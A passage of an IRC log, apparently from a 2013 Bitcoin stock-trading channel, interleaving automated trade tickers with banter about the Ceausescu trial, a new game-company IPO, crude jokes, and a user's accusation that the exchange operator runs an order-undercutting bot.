18:21:29 My friend was living in Vietnam with his then gf, and some people saw him go into her relative's house, and the police came and said, "Give us 50 dollars for having a white person in your house." Jun 03 18:21:34 not bought :/ Jun 03 18:21:38 In a country most notable for tourism and you cant smoke out..i'll have to remember not to vacaction there, regardless of what I heard about the picturesuqe sunrises. Jun 03 18:22:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.002 BTC [-] Jun 03 18:22:32 In fact, you can survive without pot for long periods of time. Jun 03 18:22:39 little known fact Jun 03 18:23:15 i dont think any of us are potheads Jun 03 18:23:17 well Jun 03 18:23:21 i'm probly wrong Jun 03 18:23:24 deadweasel: tell that to Amanda Bynes Jun 03 18:23:33 ;;google amanda bynes Jun 03 18:23:34 Amanda Bynes (AmandaBynes) on Twitter: ; Amanda Bynes - Wikipedia, the free encyclopedia: ; Amanda Bynes - IMDb: Jun 03 18:24:26 she still has a twitter after all her cray cray-ness? Jun 03 18:24:45 it's the first time I've heard the name. Jun 03 18:25:01 did she die from an acute lack of marihuana? Jun 03 18:25:24 lmao Jun 03 18:25:25 used marijuana needles Jun 03 18:26:40 the government of President Bashar Assad took the trouble on Sunday to warn its citizens against travel to neighboring Turkey on the grounds it might not be safe there. Jun 03 18:26:41 HAHAHA Jun 03 18:26:43 this rules lmao Jun 03 18:26:52 lmfao yeah Jun 03 18:26:58 quite the illusion he is living in Jun 03 18:27:03 What rules about it mircea_popescu ? Jun 03 18:27:04 http://24.media.tumblr.com/tumblr_ldnhhndEXD1qd4crbo1_500.jpg Jun 03 18:27:06 be careful kids Jun 03 18:27:27 mircea_popescu: i saw a video of ceaucescu's trial and execution yesterday, very poignant Jun 03 18:27:39 deadweasel: Amanda Bynes was a very successful child actress who has joined the list of child actors who go trippin' Jun 03 18:27:51 romania is not to be trifled with Jun 03 18:28:18 [BTCTC] [TAT.ASICMINER] 4 @ 0.0248 = 0.0992 BTC [+] Jun 03 18:28:55 window 10 Jun 03 18:28:57 ugh Jun 03 18:29:01 [MPEX] [S.MPOE] 15600 @ 0.00072156 = 11.2563 BTC [+] Jun 03 18:29:33 fiat500 if you can read romanian, Jun 03 18:29:36 ;;google procesul ceausescu Jun 03 18:29:37 Transcript of the closed trial of Nicolae and Elena Ceauşescu ...: ; Stenograma procesului Ceaușescu - Wikisource: ; Destinul principalilor participanţi la procesul soţilor Ceauşescu ...: (1 more message) Jun 03 18:29:44 o hey, i fell off. Jun 03 18:29:46 ;;google procesul ceausescu trilema Jun 03 18:29:47 Henry Kissinger implicat in recuperarea evreilor din Romania - Alex ...: Jun 03 18:29:51 uh. Jun 03 18:30:04 http://trilema.com/2011/procesul-ceausescu/ Jun 03 18:31:35 mircea_popescu: google translate does a miserable job of translating this Jun 03 18:31:49 it would. Jun 03 18:31:57 it's an in depth discussion of the trial. Jun 03 18:32:14 the legal arguments presented, etc. Jun 03 18:32:28 interesting, ill try to wade through the translation Jun 03 18:34:48 "The problems are two: the first problem is not the law of incitement speech, the text expresses itself by committing deeds, and therefore not clear to what extent can he be held responsible Ceausescu genocide, unless he with mine His murder, damaged, subjected etc. The thing is of course open to dispute in court, Prax do not exist, so there will undoubtedly fit hot debate." Jun 03 18:35:08 lol Jun 03 18:35:32 [BTCTC] [S.DICE-PT] 48 @ 0.00257 = 0.1234 BTC [-] Jun 03 18:35:34 [BTCTC] [S.DICE-PT] 7 @ 0.00257 = 0.018 BTC [-] Jun 03 18:36:18 i think i get the gist of that, but man does google have a long way to go Jun 03 18:36:29 [BTCTC] [TAT.ASICMINER] 5 @ 0.0248 = 0.124 BTC [+] Jun 03 18:36:49 lol Jun 03 18:37:03 for the sake of lulz quote the original i'll translate properly. Jun 03 18:37:31 Problemele sunt doua : prima problema, ca nu se face vorbire in lege de instigare, textul glasuieste de savirsirea unor fapte, si ca atare nu-i clar in ce masura Ceausescu poate fi el tinut responsabil de genocid, afara de cazul ca el cu mina lui a omorit, vatamat, supus etc. Jun 03 18:38:11 !last btctc bitvps Jun 03 18:38:12 Last trade for BITVPS on BTCTC was at 0.000839 BTC [+] Jun 03 18:38:20 !ticker btctc bitvps Jun 03 18:38:23 [BTCT:BITVPS] 1D: 0.00075 / 0.00075 / 0.000849 (1377 shares, 1 BTC), 7D: 0.000571 / 0.00068 / 0.001 (21471 shares, 14.5 BTC), 30D: 0.00051 / 0.00076 / 0.00172 (63192 shares, 47.9 BTC) Jun 03 18:38:57 [BTCTC] [BASIC-MINING] 1 @ 0.689999 BTC [+] Jun 03 18:39:46 [BTCTC] [BASIC-MINING] 1 @ 0.69 BTC [+] Jun 03 18:39:50 i found this pretty funny too Jun 03 18:39:51 "How will grab our state, created from hands, hopes and thoughts of guys hardly qualified secretarial and kitchen?" Jun 03 18:40:30 there's two problems with that. the first, that the law does not speak of instigation, it speaks of doing, and as such it's not clear how can you hold C responsible for genocide, except in the case you can show he himself killed, hurt, imposed etc. Jun 03 18:42:44 interesting corollary to the mubarak trial in egypt Jun 03 18:42:55 and of course milosovic Jun 03 18:42:57 indeed. Jun 03 18:45:27 [BTCTC] [ASICMINER-PT] 4 @ 2.48 = 9.92 BTC [+] Jun 03 18:45:33 [BTCTC] [ASICMINER-PT] 3 @ 2.48995 = 7.4699 BTC [+] Jun 03 18:45:35 [BTCTC] [ASICMINER-PT] 1 @ 2.4959 BTC [+] Jun 03 18:46:43 [BTCTC] [TAT.ASICMINER] 3 @ 0.02487 = 0.0746 BTC [+] Jun 03 18:50:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.02487 = 0.0497 BTC [+] Jun 03 18:57:29 mircea_popescu: it was a show-trial basically, i dont even think they tried to hide that fact Jun 03 18:58:06 [MPEX] [S.MPOE] 100 @ 0.00072156 = 0.0722 BTC [+] Jun 03 19:02:40 indeed. Jun 03 19:02:54 very comical one, if you understand the language and law Jun 03 19:03:24 http://trilema.com/2013/introducing-smg-the-ministry-of-games/ Jun 03 19:03:31 big deal announcement. Jun 03 19:05:44 [BTCTC] [TAT.ASICMINER] 19 @ 0.02487 = 0.4725 BTC [+] Jun 03 19:06:53 [BTCTC] [TAT.ASICMINER] 16 @ 0.02489 = 0.3982 BTC [+] Jun 03 19:07:04 when does it launch? Jun 03 19:07:42 oic i think Jun 03 19:09:57 actual mpex contract later today, actual ipo closes on the 10th Jun 03 19:11:41 game development? do you have a portfolio of games developed already? Jun 03 19:12:42 he plays them all the time, isnt that enough? Jun 03 19:12:57 topace_: if there's anything I'm sure of, mircea_popescu created cat mario - www.youtube.com/watch?v=BksFy5qbwwM Jun 03 19:13:23 [HAVELOCK] [SDICE] 2 @ 0.2233 = 0.4466 BTC [-] Jun 03 19:13:54 [HAVELOCK] [SDICE] 1 @ 0.2232 BTC [-] Jun 03 19:14:33 [MPEX] [S.MPOE] 10273 @ 0.00071866 = 7.3828 BTC [-] Jun 03 19:14:35 [MPEX] [S.MPOE] 7861 @ 0.0007183 = 5.6466 BTC [-] Jun 03 19:21:31 topace_ nope. Jun 03 19:21:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.02489 BTC [+] Jun 03 19:22:43 [MPEX] [S.MPOE] 4200 @ 0.0007183 = 3.0169 BTC [-] Jun 03 19:32:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.02489 BTC [+] Jun 03 19:35:30 what brought on this game dev ipo? Where can we read about the companies under this umbrella? Any games out yet? Jun 03 19:38:10 [BTCTC] [PAJKA.BOND] 10 @ 0.08 = 0.8 BTC [-] Jun 03 19:40:41 is there a better question I could be asking? Jun 03 19:43:00 [BTCTC] [ASICMINER-PT] 2 @ 2.487 = 4.974 BTC [-] Jun 03 19:43:08 usagi, no idea what you're talking about, totally don't care. but how is the silver biz? Jun 03 19:45:44 i thought that for a split second, but when I didn't get it, I was sure it was just trollin ;) Jun 03 19:45:47 deadweasel hehe, first things first. ipo, the nwe see what btc is gathered together. Jun 03 19:46:05 seems backwards Jun 03 19:46:06 but anyway, bitcoin is basically game currency. that's what it's for. Jun 03 19:47:15 mircea_popescu, of course, it was Magic currency first, but now it's something else. What would the utility be of the Game IPO? Where does the product come into play? Jun 03 19:48:11 step 1. some people decide on a problem to solve ; step 2. those people come up with a way to do it and calculate resouerces needed ; step 3. those people gather the needed resources. Jun 03 19:48:21 asking me about "is the problem already solved" presumes we're past step 3 Jun 03 19:49:23 I see. I think understand the status of this IPO. Jun 03 19:50:45 as the article says, unlike all the other mpex ipos, which were sale by owner of established product, this is new biz. Jun 03 19:51:51 link to article? Jun 03 19:52:00 I did like the traditional IPO offering piece. That's all great stuff, I just want to fondle whatever it is that is worth investing in. Jun 03 19:52:29 [MPEX] [S.BBET] 16 @ 0.00105001 = 0.0168 BTC [-] Jun 03 19:52:30 [MPEX] [S.BBET] 2284 @ 0.0008501 = 1.9416 BTC [-] Jun 03 19:52:35 but since it's new biz, that part cannot yet be fondled. Jun 03 19:54:02 peterl http://trilema.com/2013/introducing-smg-the-ministry-of-games/ Jun 03 19:54:38 deadweasel the two are not distinct however. you can just wait out the ipo, see if any value arises and then buy in lateer Jun 03 19:54:57 of course it would by definition be for more per share, but nothing wrong with that in principle. Jun 03 19:57:15 uh what happend here https://fastcash4bitcoins.com/ Jun 03 19:57:26 https://bitcointalk.org/index.php?topic=224057.20 Jun 03 19:57:30 hello when are the SBET earnings/dividends released? Jun 03 19:57:30 that. Jun 03 19:57:41 eyetalian http://trilema.com/2013/bitbet-may-2013-statement/ announced there Jun 03 19:58:30 oh yes ill be signing it shortly Jun 03 20:07:03 [BTCTC] [ASICMINER-PT] 4 @ 2.462811 = 9.8512 BTC [-] Jun 03 20:07:25 [BTCTC] [ASICMINER-PT] 5 @ 2.46281 = 12.3141 BTC [-] Jun 03 20:07:59 [BTCTC] [ASICMINER-PT] 4 @ 2.4628 = 9.8512 BTC [-] Jun 03 20:08:25 [BTCTC] [ASICMINER-PT] 1 @ 2.462 BTC [-] Jun 03 20:09:02 [BTCTC] [ASICMINER-PT] 1 @ 2.461004 BTC [-] Jun 03 20:11:11 mircea_popescu, I'll watch for now, but I'm glad to see some new IPOs emerging. Jun 03 20:11:19 especially as price is somewhat stable. Jun 03 20:11:26 yeah. Jun 03 20:16:33 And who will be the first to issue a PT? :-) Jun 03 20:19:21 [BTCTC] [RSM] 28 @ 0.006881 = 0.1927 BTC [-] Jun 03 20:19:24 TAT, obviously. Jun 03 20:19:28 lol Jun 03 20:19:49 I'm going to sell my dead grandmother in a TAT-PT Jun 03 20:19:56 box and all Jun 03 20:20:40 [BTCTC] [RSM] 1 @ 0.00688 BTC [-] Jun 03 20:20:42 [BTCTC] [RSM] 91 @ 0.0068 = 0.6188 BTC [-] Jun 03 20:21:56 [BTCTC] [TAT.ASICMINER] 5 @ 0.02489 = 0.1245 BTC [+] Jun 03 20:22:44 [BTCTC] [TAT.ASICMINER] 2 @ 0.02489 = 0.0498 BTC [+] Jun 03 20:24:39 [HAVELOCK] [HIM] 1 @ 2.7 BTC [-] Jun 03 20:26:51 [HAVELOCK] [ASICM] 4 @ 0.02465 = 0.0986 BTC [-] Jun 03 20:26:52 [HAVELOCK] [ASICM] 54 @ 0.02465 = 1.3311 BTC [-] Jun 03 20:27:23 [HAVELOCK] [ASICM] 70 @ 0.0248 = 1.736 BTC [+] Jun 03 20:34:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.0248 BTC [-] Jun 03 20:35:49 [HAVELOCK] [HIM] 3 @ 2.7 = 8.1 BTC [-] Jun 03 20:37:58 http://tvtropes.org/pmwiki/pmwiki.php/Main/MusicIsPolitics Jun 03 20:38:03 for all our rapper friends :D Jun 03 20:39:38 [HAVELOCK] [VTX] 1 @ 0.4241 BTC [+] Jun 03 20:39:53 [BTCTC] [ASICMINER-PT] 1 @ 2.458 BTC [-] Jun 03 20:43:20 [HAVELOCK] [ASICM] 4 @ 0.02465 = 0.0986 BTC [-] Jun 03 20:43:48 [HAVELOCK] [ASICM] 17 @ 0.02465 = 0.4191 BTC [-] Jun 03 20:44:08 [HAVELOCK] [ASICM] 1 @ 0.02465 BTC [-] Jun 03 20:46:13 Did somebody say PT? Jun 03 20:46:17 :) Jun 03 20:47:24 Yeah, MP is putting up a new asset, and I just can bring myself to doing all that PGP stuff to trade. Jun 03 20:47:35 yes, I'd like to offer up DEAD.GMA shares Jun 03 20:48:09 I'm offering 1 billion pieces of my dead grandmother, each for .01 BTC. Jun 03 20:48:34 how's she generating revenue ? Jun 03 20:48:46 furuknap iirc you can use coinbr Jun 03 20:49:48 MP, I know, but it would only be for this; the other assets have PTs already. Jun 03 20:50:03 *the other assets _I trade_ Jun 03 20:50:20 maybe i'll call it TAT.MASTER Jun 03 20:50:30 but really, Jun 03 20:50:34 a PT would be tough Jun 03 20:50:38 everyone wants divs Jun 03 20:50:41 mircea_popescu, this is a traditional IPO, we will decide revenue generators later. Jun 03 20:50:47 ;) Jun 03 20:51:01 hahaha i see Jun 03 20:51:10 and i assume this asset won't see any divs for quite a while Jun 03 20:51:57 ThickAsThieves yearly, if at all. Jun 03 20:52:07 [MPEX] [S.MPOE] 7900 @ 0.0007183 = 5.6746 BTC [-] Jun 03 20:52:32 every six months her total mass is reduced, thus your shares become more valuable, as the total is reduced. Jun 03 20:52:38 so no divs Jun 03 20:52:40 the amatuer mining professional wouldnt stand for that Jun 03 20:52:46 as a PT Jun 03 20:53:05 ammortalization Jun 03 20:53:09 :-) Jun 03 20:53:11 lol Jun 03 20:53:12 nice Jun 03 20:53:14 :) Jun 03 20:53:38 amortalization* Jun 03 20:53:41 amateur professional lol. nice. Jun 03 20:54:22 also known as "prosumers" Jun 03 20:54:39 how's she generating revenue ? << ever heard the term 'find a fold and...'? Jun 03 20:54:52 i have not. Jun 03 20:55:06 what is it? Jun 03 20:55:12 -imsaguy- typically said about the larger girls.. find a fold and f it. Jun 03 20:55:21 i am 12. Jun 03 20:55:29 what is this? Jun 03 20:55:34 yes this is dog. Jun 03 20:56:13 (fwiw, the romanian expression is "you can only fuck her after you roll her in flour and find the wet spot") Jun 03 20:56:45 imsaguy, if you purchase enough DEAD.GMA shares you will have voting rights on which fold will be appropriated. Jun 03 20:57:40 what if it farts ? Jun 03 20:57:51 then you have chosen your fold poorly. Jun 03 20:57:59 choose again. Jun 03 20:58:12 she's not picky. Jun 03 20:58:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.02489 BTC [+] Jun 03 20:58:19 anymore Jun 03 20:59:47 [HAVELOCK] [HIM] 3 @ 2.73 = 8.19 BTC [+] Jun 03 20:59:49 [HAVELOCK] [HIM] 1 @ 2.75 BTC [+] Jun 03 21:00:38 [BTCTC] [ASICMINER-PT] 1 @ 2.4572 BTC [-] Jun 03 21:02:16 Im pretty certain that once dead, they all fart Jun 03 21:02:33 it's a feature Jun 03 21:02:40 not a defect Jun 03 21:03:57 well the only way forward is for you to present this at the upcoming "first" coinsomething conference Jun 03 21:04:55 how many fans will she have? Jun 03 21:06:47 liking her on facebook requires owning DEAD.GMA-PT shares Jun 03 21:07:05 and the number will be in tens of twelves Jun 03 21:08:47 [BTCTC] [TAT.ASICMINER] 9 @ 0.024551 = 0.221 BTC [-] Jun 03 21:11:07 [BTCTC] [PAJKA.BOND] 1 @ 0.109 BTC [+] Jun 03 21:12:16 [MPEX] [S.MPOE] 3700 @ 0.00071941 = 2.6618 BTC [+] Jun 03 21:12:41 deadweasel, it'd probably be easier to use tonal numbers Jun 03 21:12:55 tonal, oldest injoke in btc ? Jun 03 21:13:29 if by in, you mean lame, yes Jun 03 21:14:31 I always think of deaf people talking when I read tonal bitcoin Jun 03 21:14:58 that's fairly accurate Jun 03 21:15:31 [HAVELOCK] [ASICM] 3 @ 0.02465 = 0.074 BTC [-] Jun 03 21:16:10 [HAVELOCK] [ASICM] 21 @ 0.02461 = 0.5168 BTC [-] Jun 03 21:16:11 [HAVELOCK] [ASICM] 41 @ 0.024601 = 1.0086 BTC [-] Jun 03 21:16:12 [HAVELOCK] [ASICM] 83 @ 0.0246 = 2.0418 BTC [-] Jun 03 21:16:14 [HAVELOCK] [ASICM] 2 @ 0.0246 = 0.0492 BTC [-] Jun 03 21:16:15 [HAVELOCK] [ASICM] 50 @ 0.024509 = 1.2255 BTC [-] Jun 03 21:16:16 [HAVELOCK] [ASICM] 303 @ 0.02450401 = 7.4247 BTC [-] Jun 03 21:20:09 all injokes are lame to outsiders :D Jun 03 21:23:35 DEAF.GMA-PT will not be offered until my other, deaf grandma is in the ground. Then her Tonal IPO can be announced. Jun 03 21:24:30 DEAD.MA-PT and DEAD.PA-PT can be offered as needed. Jun 03 21:26:22 I remember the first time I read about tonal , I stopped when I reached Bong-Bitcoin Jun 03 21:26:26 :( Jun 03 21:26:57 [BTCTC] [ASICMINER-PT] 10 @ 2.47999 = 24.7999 BTC [+] Jun 03 21:27:24 [MPEX] [S.MPOE] 3950 @ 0.00071941 = 2.8417 BTC [+] Jun 03 21:28:44 [BTCTC] [TAT.ASICMINER] 9 @ 0.024848 = 0.2236 BTC [+] Jun 03 21:28:47 [BTCTC] [TAT.ASICMINER] 72 @ 0.024848 = 1.7891 BTC [+] Jun 03 21:29:42 [HAVELOCK] [ASICM] 10 @ 0.024505 = 0.2451 BTC [+] Jun 03 21:34:27 [BTCTC] [S.DICE-PT] 20 @ 0.002575 = 0.0515 BTC [+] Jun 03 21:37:29 [BTCTC] [TAT.ASICMINER] 100 @ 0.024848 = 2.4848 BTC [+] Jun 03 21:37:32 [MPEX] [S.MPOE] 20350 @ 0.00071648 = 14.5804 BTC [-] Jun 03 21:37:34 [MPEX] [S.MPOE] 6150 @ 0.0007164 = 4.4059 BTC [-] Jun 03 21:37:40 [HAVELOCK] [ASICM] 130 @ 0.024505 = 3.1857 BTC [+] Jun 03 21:39:00 [HAVELOCK] [ASICM] 41 @ 0.024649 = 1.0106 BTC [+] Jun 03 21:39:53 [HAVELOCK] [ASICM] 175 @ 0.02465 = 4.3138 BTC [+] Jun 03 21:40:15 [BTCTC] [ASICMINER-PT] 1 @ 2.47999 BTC [+] Jun 03 21:40:51 [BTCTC] [TAT.ASICMINER] 41 @ 0.024848 = 1.0188 BTC [+] Jun 03 21:41:59 [BTCTC] [ASICMINER-PT] 4 @ 2.47999 = 9.92 BTC [+] Jun 03 21:43:08 [HAVELOCK] [ASICM] 90 @ 0.02489 = 2.2401 BTC [+] Jun 03 21:44:48 [HAVELOCK] [ASICM] 41 @ 0.02451 = 1.0049 BTC [-] Jun 03 21:44:49 [HAVELOCK] [ASICM] 49 @ 0.02450401 = 1.2007 BTC [-] Jun 03 21:44:51 [HAVELOCK] [ASICM] 23 @ 0.02449 = 0.5633 BTC [-] Jun 03 21:44:52 [BTCTC] [TAT.ASICMINER] 100 @ 0.024848 = 2.4848 BTC [+] Jun 03 21:46:43 [BTCTC] [TAT.ASICMINER] 2 @ 0.024848 = 0.0497 BTC [+] Jun 03 21:48:11 [BTCTC] [COGNITIVE] 1 @ 0.289989 BTC [-] Jun 03 21:50:07 [MPEX] [S.MPOE] 8950 @ 0.00071941 = 6.4387 BTC [+] Jun 03 21:50:16 [MPEX] [S.MPOE] 2150 @ 0.00072261 = 1.5536 BTC [+] Jun 03 21:50:53 [BTCTC] [PAJKA.BOND] 40 @ 0.1098 = 4.392 BTC [+] Jun 03 21:54:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.024845 = 0.0497 BTC [-] Jun 03 21:56:15 ;;depth Jun 03 21:56:15 Error: "depth" is not a valid command. Jun 03 21:56:20 !depth Jun 03 22:03:01 ;;bc,stats Jun 03 22:03:03 Current Blocks: 239532 | Current Difficulty: 1.2153411709775832E7 | Next Difficulty At Block: 239903 | Next Difficulty In: 371 blocks | Next Difficulty In About: 1 day, 17 hours, 59 minutes, and 59 seconds | Next Difficulty Estimate: 15257411.5782 | Estimated Percent Change: 25.54015 Jun 03 22:12:20 sheeeeet Jun 03 22:12:22 lol Jun 03 22:14:47 [BTCTC] [TAT.ASICMINER] 6 @ 0.02484 = 0.149 BTC [-] Jun 03 22:15:02 [BTCTC] [ASICMINER-PT] 1 @ 2.477 BTC [-] Jun 03 22:15:54 [BTCTC] [TAT.ASICMINER] 56 @ 0.02484 = 1.391 BTC [-] Jun 03 22:16:29 [MPEX] [S.MPOE] 1950 @ 0.00072261 = 1.4091 BTC [+] Jun 03 22:24:20 [BTCTC] [TAT.ASICMINER] 22 @ 0.02484 = 0.5465 BTC [-] Jun 03 22:47:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.02484 BTC [-] Jun 03 22:49:21 [MPEX] [S.MPOE] 2496 @ 0.00072482 = 1.8092 BTC [+] Jun 03 22:49:29 [MPEX] [S.MPOE] 4321 @ 0.0007254 = 3.1345 BTC [+] Jun 03 22:49:31 [MPEX] [S.MPOE] 2805 @ 0.00072541 = 2.0348 BTC [+] Jun 03 22:50:51 hi all Jun 03 22:51:45 [BTCTC] [ASICMINER-PT] 1 @ 2.469 BTC [-] Jun 03 22:52:02 [HAVELOCK] [ASICM] 37 @ 0.02488 = 0.9206 BTC [+] Jun 03 22:54:31 hey MJR_ Jun 03 22:54:35 how's it going? Jun 03 22:57:49 and here it is http://mpex.co/?mpsic=S.MG Jun 03 23:00:43 [MPEX] [S.MPOE] 4321 @ 0.0007251 = 3.1332 BTC [-] Jun 03 23:00:45 [MPEX] [S.MPOE] 2929 @ 0.00072541 = 2.1247 BTC [+] Jun 03 23:01:58 very dissapointing dividend on sbet this month :( Jun 03 23:03:09 beats sdice Jun 03 23:03:44 [BTCTC] [PAJKA.BOND] 9 @ 0.109 = 0.981 BTC [-] Jun 03 23:03:47 [BTCTC] [PAJKA.BOND] 21 @ 0.109 = 2.289 BTC [-] Jun 03 23:04:11 how come when a limit sell order is placed, it seems someone automatically places another just below it? Jun 03 23:04:15 with bbet? Jun 03 23:04:38 is there a bot...? Jun 03 23:05:51 um, sell order on bbet? Jun 03 23:06:04 what is the question? Jun 03 23:06:11 if you try to sell bbet shares Jun 03 23:06:16 with a limit sell Jun 03 23:06:25 almost instantly another sell order appears below it Jun 03 23:06:45 eyetalian i see a few at 149999 ? Jun 03 23:06:46 example if you try to sell for 0.19. instantly a sell of 0.1899 appears below it Jun 03 23:07:08 possibly somebody is running a bot. Jun 03 23:08:13 its almost always a 5000 or 10000 lot size Jun 03 23:09:48 [BTCTC] [PAJKA.BOND] 9 @ 0.1087 = 0.9783 BTC [-] Jun 03 23:10:24 [BTCTC] [PAJKA.BOND] 4 @ 0.10861 = 0.4344 BTC [-] Jun 03 23:10:27 [BTCTC] [PAJKA.BOND] 10 @ 0.1086 = 1.086 BTC [-] Jun 03 23:10:28 mircea_popescu: how can a bot have so many shares on offer? Jun 03 23:10:30 [BTCTC] [PAJKA.BOND] 13 @ 0.1084 = 1.4092 BTC [-] Jun 03 23:10:40 eyetalian how many you mean ? 10 k ? Jun 03 23:10:43 that's not a lot is it. Jun 03 23:10:48 not really Jun 03 23:10:57 what does qty matter anyway Jun 03 23:11:00 yes but no matter what price you put the bot comes in Jun 03 23:11:09 maybe he owns 100,000 Jun 03 23:11:13 it stops you from being able to exit Jun 03 23:11:25 so put a low enough price Jun 03 23:11:33 i imagine if the price is too high it will undercut you, Jun 03 23:11:35 yea and take a huge loss Jun 03 23:11:36 but at some point it runs out Jun 03 23:11:47 or trick the bot into selling into bids, if it's that exact Jun 03 23:11:52 well this is called price formation you know. the market atm is incredibly wide Jun 03 23:12:20 no its called someone having a huge ammount of shares and gaming the market to ensure all bids are aimed towards the certain supply Jun 03 23:12:21 85/150 wtf is that. Jun 03 23:12:42 just suspiscious to me thats all Jun 03 23:12:58 maybe im wrong Jun 03 23:13:02 i still don't see how 10k shares is a lot Jun 03 23:13:10 its not 10k Jun 03 23:13:10 it's like 15btc worth or something neh ? Jun 03 23:13:37 almost the entire ask size is the bots shares Jun 03 23:13:41 ask side Jun 03 23:13:46 [BTCTC] [S.DICE-PT] 5 @ 0.0025 = 0.0125 BTC [-] Jun 03 23:14:01 um Jun 03 23:14:07 have you read the ipo contract eyetalian ? Jun 03 23:14:18 well yes i know you are selling most of those Jun 03 23:14:25 [BTCTC] [ASICMINER-PT] 1 @ 2.469 BTC [-] Jun 03 23:14:30 right, like 99% of the ask side is leftover from ipo Jun 03 23:14:39 it just seems youve set it up to make sure any new bids go straight to you Jun 03 23:14:55 i assume the bot is yours. Jun 03 23:15:15 nope, i've not been selling any shares. Jun 03 23:15:27 ok Jun 03 23:15:37 i dont know maybe i am mistaken Jun 03 23:16:04 it doesnt matter tho Jun 03 23:16:18 you need to sell for less than whomever else is selling Jun 03 23:16:25 you cant. Jun 03 23:16:27 simple as that Jun 03 23:16:30 sur eyou can Jun 03 23:16:35 the bot will undercut you forcing you to do a market order. Jun 03 23:16:41 well if it's a bot ir probably has a limit Jun 03 23:16:43 and take a huge loss, which i assume the bot sits on the bid side too Jun 03 23:16:45 150, 140, 120, w/e it is Jun 03 23:16:47 with a very very low bid Jun 03 23:16:54 try pushing the bot into the bids Jun 03 23:17:00 .ile .0001 at a time Jun 03 23:17:02 like* Jun 03 23:17:11 you'll find the bottom Jun 03 23:17:13 [BTCTC] [BITVPS] 2 @ 0.000835 = 0.0017 BTC [-] Jun 03 23:17:19 thickasthieves: the bids are very low on purpose i assume it is the bot buying back Jun 03 23:17:21 probably halves is the fastest. Jun 03 23:17:31 mircea_popescu: please dont pretend you dont know about a bot. Jun 03 23:17:37 ;;calc 150+85/2 Jun 03 23:17:37 192.5 Jun 03 23:17:49 i'm not pretending anything dude. Jun 03 23:18:01 its your exchange you are well aware whats active on it Jun 03 23:18:09 ;;calc (150+85)/2 Jun 03 23:18:09 117.5 Jun 03 23:18:11 you are confused man Jun 03 23:18:16 even if it IS the bot Jun 03 23:18:17 i don't snoop nearly to the degree everyone assumes. Jun 03 23:18:19 on both ends Jun 03 23:18:23 this is still okay Jun 03 23:18:39 [HAVELOCK] [ASICM] 37 @ 0.024501 = 0.9065 BTC [-] Jun 03 23:18:41 it just means no one else is buying Jun 03 23:18:41 [HAVELOCK] [ASICM] 63 @ 0.0245 = 1.5435 BTC [-] Jun 03 23:18:41 the bot absorbs any new bids, diverting BTC to itself Jun 03 23:18:48 ... Jun 03 23:18:55 when someone tries to buy the bot ensures its the bots supply you are buying Jun 03 23:19:03 so? Jun 03 23:19:09 its just suspiscious thats all Jun 03 23:19:13 its a bot Jun 03 23:19:17 so its 1 participant gaming the market Jun 03 23:19:21 they are designed to make money Jun 03 23:19:32 if the bot is in control, Jun 03 23:19:37 it's because no one else is playing Jun 03 23:19:40 i very much doubt a bot makes money on s.bbet tbh. Jun 03 23:19:46 $avg s.bbet Jun 03 23:19:52 [BTCTC] [ASICMINER-PT] 7 @ 2.469 = 17.283 BTC [-] Jun 03 23:19:52 it doesnt trading wise Jun 03 23:19:55 $t s.bbet Jun 03 23:19:59 wtf was it Jun 03 23:20:01 it just ensures you always get the new BTC mircea. Jun 03 23:20:07 !t s.bbet Jun 03 23:20:08 How can I be of assistance, my poor man? Jun 03 23:20:22 $vwap s.bbet Jun 03 23:20:38 !ticker s.bbet Jun 03 23:20:39 Some are born to endless night. Jun 03 23:20:40 mpexbot = gone Jun 03 23:20:46 heh mpexbot is ded ghuh ? Jun 03 23:20:52 its my bot Jun 03 23:20:55 da fuck happened there Jun 03 23:20:58 any questions? Jun 03 23:21:00 !ticker m s.bbet Jun 03 23:21:01 [MPEX:S.BBET] 1D: 0.0008501 / 0.00098566 / 0.00149999 (2900 shares, 2.86 BTC), 7D: 0.0008501 / 0.00098566 / 0.00149999 (2900 shares, 2.86 BTC), 30D: 0.0008501 / 0.00146134 / 0.00172499 (12215 shares, 17.85 BTC) Jun 03 23:21:03 lol srsly ? Jun 03 23:21:31 nahi hate bots Jun 03 23:21:32 lol Jun 03 23:21:43 but my point is Jun 03 23:21:43 smickles hey where's mpexbot! Jun 03 23:21:47 it may as well be me Jun 03 23:21:47 and i hate you tat Jun 03 23:21:53 hehe Jun 03 23:22:01 lol Jun 03 23:22:08 [HAVELOCK] [VTX] 5 @ 0.4241 = 2.1205 BTC [+] Jun 03 23:22:53 (00:31) (!) mpexbot ~supybot@unaffiliated/smickles/bot/mpexbot has quit [Ping timeout: 252 seconds] Jun 03 23:22:55 i wonder if there actually is a bot or the guy just has a "world is satan" outlook Jun 03 23:23:00 looks like it timed out today Jun 03 23:23:16 [HAVELOCK] [ASICM] 4 @ 0.0247999 = 0.0992 BTC [+] Jun 03 23:23:28 mircea_popescu dont act stupid. Jun 03 23:23:34 you know what you are doing Jun 03 23:23:47 your definition of "acting stupid" may be a little broken. Jun 03 23:24:03 you are using a script to divert any BTC bids to yourself. Jun 03 23:24:07 [HAVELOCK] [ASICM] 80 @ 0.02489 = 1.9912 BTC [+] Jun 03 23:24:12 sigh. Jun 03 23:24:14 being the IPO issuer. Jun 03 23:24:26 i still dont understand the problem Jun 03 23:24:30 even if it was mp Jun 03 23:24:31 i'm the half issuer who people praise, as per traditiob Jun 03 23:24:31 or me Jun 03 23:24:39 it's kakobrekla who people cuss out. please stick to it. Jun 03 23:24:54 superservant and super scapegoat Jun 03 23:24:56 so many hats Jun 03 23:25:03 thickasthieves: what hes doing is being dishonest about a market functioning. Jun 03 23:25:06 [BTCTC] [PAJKA.BOND] 1 @ 0.105 BTC [-] Jun 03 23:25:10 [BTCTC] [PAJKA.BOND] 1 @ 0.105 BTC [-] Jun 03 23:25:12 he's providing liquidity Jun 03 23:25:15 [BTCTC] [PAJKA.BOND] 25 @ 0.105 = 2.625 BTC [-] Jun 03 23:25:15 :) Jun 03 23:25:19 [BTCTC] [PAJKA.BOND] 5 @ 0.1035 = 0.5175 BTC [-] Jun 03 23:25:19 thickasthieves: he only places limit sell orders when someone else is selling. Jun 03 23:25:25 [BTCTC] [PAJKA.BOND] 21 @ 0.102001 = 2.142 